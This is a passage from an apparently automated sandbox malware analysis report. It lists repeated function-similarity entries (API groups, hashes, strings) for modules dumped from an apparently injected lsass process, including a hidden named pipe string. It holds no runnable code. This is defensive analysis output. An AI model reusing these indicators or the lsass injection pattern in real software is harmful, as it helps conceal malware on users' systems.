                                            • Instruction Fuzzy Hash: A2518031749F4895EA169F66B8403E92270AF48BB0F6C0B259E3D877D6EF39D4878740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 422347752cb8a5a5f4ba61478ceba83143f2d89ceaa727bce76a7423e00b515b
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: FF317C32A08F4897E721DF52B804799A3B4BB98B95F484525DE8D43626DF78C4D78780
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: ced183f89da69b60b8a9272d777572d687372e3e94e18576f7d78a6321f913f2
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: A5318E32A08F4897E722DF16B8047D9A3B4FB88B95F5C4625DE8D83626DF38C4978740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: b2a5967eee084143195432e5f40e43866f6486d5eaa342772f780f2da15f402f
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: D0318C31618F498BEB10DF22B884799B3B0BF84F95F4851259E8E43766EE78D4C38680
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU Engine(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 839c9f9c300fb6fb3a88f4f7c443d2552f64df9f6c638fc59894e51bcba1eb08
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: 0E314A31618F498BEB11DF22B88479A63B0BB84F94F5C45659E8E83766EE38D4878700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: a7143d3f81dc630082b136a90ca0f54496fd1e4b9adf58d3744d12870631f34a
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: 59D17C7260CF988AEB20DB65A4403DD77B0FB45788F182115EA8D57B9ADBB4E5C6C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 310fc0b5922953b9c4234ef9c5d0874e37dd68400065c5e6711a8eed723815eb
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: 03D16832648B888AEB609F65A4883ED77B0FB45798F185215EE8D57B9FDB34C5C2C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 9e2277bdb93d732f8d65bec1f9792de935e17d97a6474368d5dd48676858bcf4
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: 06D1697260CF888AEB229B65A4453DD77B4FB45788F2C2115EA8D97B9ADB34C4C3C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 3cb689649fdd88a86a4149668db6177ce478f31cb262a3dabc8e4b9b4df4e1f0
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 69412D72218F84DAE760CF61F44479A77B1F788B98F488129DB8907759DF78C58ACB80
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 98616a2ff3825150f651b4fb7690e968d14ee0c6a71bcc45fe7d64e6a84f1a9b
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 59415F32218F84D6E761CF21E44479A77B1F788B99F588125DB8D47758DF39C48ACB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$nya-childproc
                                            • API String ID: 166002920-3933612297
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 709f8d1fd23cfc63cb23fbc949a151c789b254d588f567ccc9f9cf4f3d996b29
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 50114C3261CB4482F7108B21F41439A7770FB89BD4F984315EB5E02AA9CF7CC18ACB80
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$nya-childproc
                                            • API String ID: 166002920-3933612297
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 8a422d2de5b097a681069f0c02d7800a7805f06357f7c2059ff15cb4b32cedfd
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: C9114C3661CB4482E7108F21F81439A7770FB89BD4F984325EA5D43AA9CF3DC196CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 4c8f37232e856023605888e2b1735ea5b4ca42d108cd0c214cd9eba3c911007f
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 4F81C23070CF4D96FA60EB65B8413E966B1AF85B84F6C4015AA0D47397DBB8C8CB8740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: e277e449b48480b4843398206f7a681ef9f1fae92a2cb6f22c3226b47e71a24d
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: A381A03060DF4DA6FAB59B65B84A3D962B1AF86780F5C50159D0C4779FDA38C9CB8B00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: b3475ebd1878b3df7e9254989a387c3d90c6b4d1e975dd1e66cf4fe51e50b77a
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: B381B33160CF4DA6FA52AB66F4413E962B1AF85B84F7C8125994DC7397DB39C8C78300
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B31
                                            • GetLastError.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B69
                                            • FreeLibrary.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59BD7
                                            • GetProcAddress.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: f48c940c265e2daad92e5c1e5b6921450fbf53ad875bcdb193b5a88706f70175
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 6A31AE3121AF4891FF119B16B8807E523B4BF58BA0F9D0625ED1D4B796EF78E4C68390
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89B31
                                            • GetLastError.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89B69
                                            • FreeLibrary.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89BD7
                                            • GetProcAddress.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: c12e4aa8ff06e60cbbbd7569c0cd2eabf1cef89453e49187164cfbaec92f7efc
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 6731A03121AF4891EE129B16B8847E523B4BF44BA0F6D0625ED5D87796EF38E4878310
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 57ad0a87101fc014a47693d5d53f1c791703df7ebf8c7a55728d0379093e6ab6
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 1C116031718F4486E7608B56F854759B7B4FB88BE4F584224EA5E87B99CF3CC48687C0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: e3a41b74b1cc44d5356060edc72fb13dd37b5ae57991b998daf2e50b96aaf39a
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 4D11603131CF4486E7608F52F85479976B4FB88FE4F584224EA5E87BA9CF3AC4958740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 8cf41acd218546793b6ed0d90e458c47a19c5a17e27bbef3670ec55f879e2049
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 3CD17B76209F8C85EA70DB1AF49439A77B0F788B88F540156EA8D477A6DF7CC592CB00
                                            APIs
                                            Memory Dump Source
